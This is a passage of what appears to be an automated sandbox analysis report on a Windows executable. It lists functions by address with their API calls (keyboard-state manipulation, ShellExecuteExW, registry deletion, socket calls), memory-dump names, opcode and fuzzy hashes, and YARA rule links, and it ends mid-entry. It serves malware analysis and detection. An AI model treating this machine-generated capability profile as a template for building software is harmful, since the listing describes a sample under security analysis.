                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ShowWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                                                      • Opcode ID: 71983bf956c28ab6578ff00aacfbf9c6e91a86412f4dc3110f3351e2d12f4757
                                                                                                                                                                      • Instruction ID: a086417192f2293cfcc7c1db02736b2007244c227351ea67fe4a1774607baef2
                                                                                                                                                                      • Opcode Fuzzy Hash: 71983bf956c28ab6578ff00aacfbf9c6e91a86412f4dc3110f3351e2d12f4757
                                                                                                                                                                      • Instruction Fuzzy Hash: D0412B30A18780AEC7779B298C9D77B7B9AEF4A300F1AC41DE44F86960CE7D9845D714
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F6442, Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 003F645A
                                                                                                                                                                      • GetDC.USER32(00000000), ref: 003F6462
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003F646D
                                                                                                                                                                      • ReleaseDC.USER32 ref: 003F6479
                                                                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003F64B5
                                                                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003F64C6
                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003F9299,?,?,000000FF,00000000,?,000000FF,?), ref: 003F6500
                                                                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003F6520
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3864802216-0
                                                                                                                                                                      • Opcode ID: ab335bac7000b69a9a36c84dc1ba3e911c6728301a6264b32e0866266b473d5b
                                                                                                                                                                      • Instruction ID: 3423073fa48999523b7f205424997ebf8f90506f0d34d7e9369c31ddf5516fce
                                                                                                                                                                      • Opcode Fuzzy Hash: ab335bac7000b69a9a36c84dc1ba3e911c6728301a6264b32e0866266b473d5b
                                                                                                                                                                      • Instruction Fuzzy Hash: 27316F72101214BFEB128F50CC8AFFA3FADEF0A761F054065FE08EA1A5D6759841CB64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CC072, Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memcmp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2931989736-0
                                                                                                                                                                      • Opcode ID: 2c32e888d1cec3c12de64c60f2c7a460b7e9ec37b1b06b558549b66d398c4951
                                                                                                                                                                      • Instruction ID: 72d68c44e258bcbb548a12381ee91b654150934c8d8b44d2f321bc4ce284441b
                                                                                                                                                                      • Opcode Fuzzy Hash: 2c32e888d1cec3c12de64c60f2c7a460b7e9ec37b1b06b558549b66d398c4951
                                                                                                                                                                      • Instruction Fuzzy Hash: 7121FC72A20216B7E613B5214D46FBF739CAF10394B18102AFE0DFA6C3E765DD1183A5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DED8E, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00379997: __itow.LIBCMT ref: 003799C2
                                                                                                                                                                        • Part of subcall function 00379997: __swprintf.LIBCMT ref: 00379A0C
                                                                                                                                                                        • Part of subcall function 0038FEC6: _wcscpy.LIBCMT ref: 0038FEE9
                                                                                                                                                                      • _wcstok.LIBCMT ref: 003DEEFF
                                                                                                                                                                      • _wcscpy.LIBCMT ref: 003DEF8E
                                                                                                                                                                      • _memset.LIBCMT ref: 003DEFC1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                                      • String ID: X
                                                                                                                                                                      • API String ID: 774024439-3081909835
                                                                                                                                                                      • Opcode ID: 625c8fc118a9452f9bfbcd86ac54c65d5d8e24a192a8a798d3fa88c5b4569e69
                                                                                                                                                                      • Instruction ID: 01051ab394f3f8a651eeb58f61a633bf3bc1db90f7bfb5ff8f3ace6903bf64b1
                                                                                                                                                                      • Opcode Fuzzy Hash: 625c8fc118a9452f9bfbcd86ac54c65d5d8e24a192a8a798d3fa88c5b4569e69
                                                                                                                                                                      • Instruction Fuzzy Hash: EDC175715043419FC726EF24D881A5AB7E4FF85310F11892EF49A9B3A2DB74ED45CB42
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E6E17, Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 003E6F14
                                                                                                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003E6F35
                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 003E6F48
                                                                                                                                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 003E6FFE
                                                                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 003E6FBB
                                                                                                                                                                        • Part of subcall function 003CAE14: _strlen.LIBCMT ref: 003CAE1E
                                                                                                                                                                        • Part of subcall function 003CAE14: _memmove.LIBCMT ref: 003CAE40
                                                                                                                                                                      • _strlen.LIBCMT ref: 003E7058
                                                                                                                                                                      • _memmove.LIBCMT ref: 003E70C1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3619996494-0
                                                                                                                                                                      • Opcode ID: 7e181cdaaf769a86e0586bc1be15d318d9631301bd1a0f1156c1516d9a1bab35
                                                                                                                                                                      • Instruction ID: c9b98c960612d54623e0535bcb6ebdad4578bf7add1c36d1cea170d9130589f6
                                                                                                                                                                      • Opcode Fuzzy Hash: 7e181cdaaf769a86e0586bc1be15d318d9631301bd1a0f1156c1516d9a1bab35
                                                                                                                                                                      • Instruction Fuzzy Hash: 9281F271504350AFC722EB25CC86F6BB3A9EF84714F108A1DF5199B2D2DB74AD04CB92
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00371424, Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 36dc4624e7d44dbd9815566f77cd27263759fdfc660cccbe2bcb41f083362071
                                                                                                                                                                      • Instruction ID: 07310bbfd7e7c06200f846297ee87245854c3a281f3158c73bc2d3fcd42f153d
                                                                                                                                                                      • Opcode Fuzzy Hash: 36dc4624e7d44dbd9815566f77cd27263759fdfc660cccbe2bcb41f083362071
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A716D31900109EFDB268F59CC89EBEBB79FF86310F15C159F919AA251C738AA51CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FB60B, Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsWindow.USER32(011993A0), ref: 003FB6A5
                                                                                                                                                                      • IsWindowEnabled.USER32(011993A0), ref: 003FB6B1
                                                                                                                                                                      • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 003FB795
                                                                                                                                                                      • SendMessageW.USER32(011993A0,000000B0,?,?), ref: 003FB7CC
                                                                                                                                                                      • IsDlgButtonChecked.USER32(?,?), ref: 003FB809
                                                                                                                                                                      • GetWindowLongW.USER32(011993A0,000000EC), ref: 003FB82B
                                                                                                                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003FB843
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4072528602-0
                                                                                                                                                                      • Opcode ID: 889d2ad429b1b534b61dcc035575af61229babe3acd794770d21d0c37c5f521e
                                                                                                                                                                      • Instruction ID: 34c88d4adba4e0f9fc0f026e0375f50719d5ab30ed6d8c6ce6afc09117fd1d6b
                                                                                                                                                                      • Opcode Fuzzy Hash: 889d2ad429b1b534b61dcc035575af61229babe3acd794770d21d0c37c5f521e
                                                                                                                                                                      • Instruction Fuzzy Hash: A371C1B4604209AFDB26AF64C894FBAFBB9FF49300F164069EA45973A1C731AC45CB54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003EF732, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 003EF75C
                                                                                                                                                                      • _memset.LIBCMT ref: 003EF825
                                                                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 003EF86A
                                                                                                                                                                        • Part of subcall function 00379997: __itow.LIBCMT ref: 003799C2
                                                                                                                                                                        • Part of subcall function 00379997: __swprintf.LIBCMT ref: 00379A0C
                                                                                                                                                                        • Part of subcall function 0038FEC6: _wcscpy.LIBCMT ref: 0038FEE9
                                                                                                                                                                      • GetProcessId.KERNEL32(00000000), ref: 003EF8E1
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 003EF910
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                                                                      • String ID: @
                                                                                                                                                                      • API String ID: 3522835683-2766056989
                                                                                                                                                                      • Opcode ID: b9fd348f0a42398e2263f8b058d68fa757cba0ed56bc2ae33dec1ed1e395c90f
                                                                                                                                                                      • Instruction ID: ee76581db20bc3c886a35ac5a4b617ec7ecec30638fd44bcdc3d4c15964a4f23
                                                                                                                                                                      • Opcode Fuzzy Hash: b9fd348f0a42398e2263f8b058d68fa757cba0ed56bc2ae33dec1ed1e395c90f
                                                                                                                                                                      • Instruction Fuzzy Hash: F361B275A00669DFCF16EF55C480AADBBF4FF48310F15816AE849AB391CB74AD40CB90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D145D, Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetParent.USER32(?), ref: 003D149C
                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 003D14B1
                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 003D1512
                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 003D1540
                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 003D155F
                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 003D15A5
                                                                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003D15C8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                      • Opcode ID: ce334886c1da12209328b252fbd5d362bda1c25f80f2cee21762a4797dbbd60e
                                                                                                                                                                      • Instruction ID: 7a554d5163cc7b5ae1395f496c4efe5d0957277c96ed9b0a76ebc7e24786691c
                                                                                                                                                                      • Opcode Fuzzy Hash: ce334886c1da12209328b252fbd5d362bda1c25f80f2cee21762a4797dbbd60e
                                                                                                                                                                      • Instruction Fuzzy Hash: FF5103A26043D53FFB374634AC45BBABEAA6B46304F09848AE5D549AD2C3D8EC84D750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D1276, Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetParent.USER32(00000000), ref: 003D12B5
                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 003D12CA
                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 003D132B
                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003D1357
                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003D1374
                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003D13B8
                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003D13D9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                      • Opcode ID: 872947a9fe6b271d0903461e907f60d6dec2bdf7f723fd4803c4e532caaec986
                                                                                                                                                                      • Instruction ID: 8d21ccc48ae7fefa4e801630f620b2605b64cb05d32b2ad6ab8639a2e44dae9c
                                                                                                                                                                      • Opcode Fuzzy Hash: 872947a9fe6b271d0903461e907f60d6dec2bdf7f723fd4803c4e532caaec986
                                                                                                                                                                      • Instruction Fuzzy Hash: 8F51F4A29047D57FFB3387359C45B7ABFA96F06300F08858AE1D44AAC2D395EC94E750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D589F, Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcsncpy$LocalTime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2945705084-0
                                                                                                                                                                      • Opcode ID: c59b1e4e44e9a40b5ab38b62a5f85db4f7d3ef067fa98477d4f7c32994f55933
                                                                                                                                                                      • Instruction ID: da5ed4011f773e28041d2de9b695093264d38cb19e6966fde9ae7afaf815874c
                                                                                                                                                                      • Opcode Fuzzy Hash: c59b1e4e44e9a40b5ab38b62a5f85db4f7d3ef067fa98477d4f7c32994f55933
                                                                                                                                                                      • Instruction Fuzzy Hash: 924174A6C2052876CF12EBF49C86DCFB3A8AF05310F509956F518E7221E734E715C7AA
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D38AD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003D48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003D38D3,?), ref: 003D48C7
                                                                                                                                                                        • Part of subcall function 003D48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003D38D3,?), ref: 003D48E0
                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 003D38F3
                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003D390F
                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 003D3927
                                                                                                                                                                      • _wcscat.LIBCMT ref: 003D396F
                                                                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 003D39DB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                      • API String ID: 1377345388-1173974218
                                                                                                                                                                      • Opcode ID: ee932a81e510622498d7eef1516eebd2b3cd146ec9d12d49205ef7409e876a64
                                                                                                                                                                      • Instruction ID: 8f633189d86852a0ec64d89dcf18f05c21c0c40246575dcbc76fb5aee48c6ce7
                                                                                                                                                                      • Opcode Fuzzy Hash: ee932a81e510622498d7eef1516eebd2b3cd146ec9d12d49205ef7409e876a64
                                                                                                                                                                      • Instruction Fuzzy Hash: C0416DB2509344AAC752EF64D491AEBB7ECAF88340F40092FB48AC7251EB74D648C753
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F7500, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 003F7519
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003F75C0
                                                                                                                                                                      • IsMenu.USER32 ref: 003F75D8
                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003F7620
                                                                                                                                                                      • DrawMenuBar.USER32 ref: 003F7633
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 3866635326-4108050209
                                                                                                                                                                      • Opcode ID: bb8e4ca7e9d2e78794e9ec53d52beeebf6a15da4cfff2a3e2d3ccc7886d1d61d
                                                                                                                                                                      • Instruction ID: 8a58bfed3b8ffce43b7505713feec908eb8b03a78d31f3d56e27fefdf7f473a1
                                                                                                                                                                      • Opcode Fuzzy Hash: bb8e4ca7e9d2e78794e9ec53d52beeebf6a15da4cfff2a3e2d3ccc7886d1d61d
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D412675A05609EFDB21DF94D884EAABBF8FF09310F058129EA199B350D730AD50CFA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F122D, Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 003F125C
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003F1286
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 003F133D
                                                                                                                                                                        • Part of subcall function 003F122D: RegCloseKey.ADVAPI32(?), ref: 003F12A3
                                                                                                                                                                        • Part of subcall function 003F122D: FreeLibrary.KERNEL32(?), ref: 003F12F5
                                                                                                                                                                        • Part of subcall function 003F122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003F1318
                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 003F12E0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 395352322-0
                                                                                                                                                                      • Opcode ID: 8114e8e8d2b8b274f6effbf94211ddb12ea49ba6619a9d7c71340a4bc01e7be7
                                                                                                                                                                      • Instruction ID: 6998eca192a900d421deba3d93b71adfbf22349103a5552963e7a7646bd91e62
                                                                                                                                                                      • Opcode Fuzzy Hash: 8114e8e8d2b8b274f6effbf94211ddb12ea49ba6619a9d7c71340a4bc01e7be7
                                                                                                                                                                      • Instruction Fuzzy Hash: EC310D7590111DFFDB169B90EC89EFEB7BCEF08300F00056AEA01E2151DA749E45DBA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F653C, Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
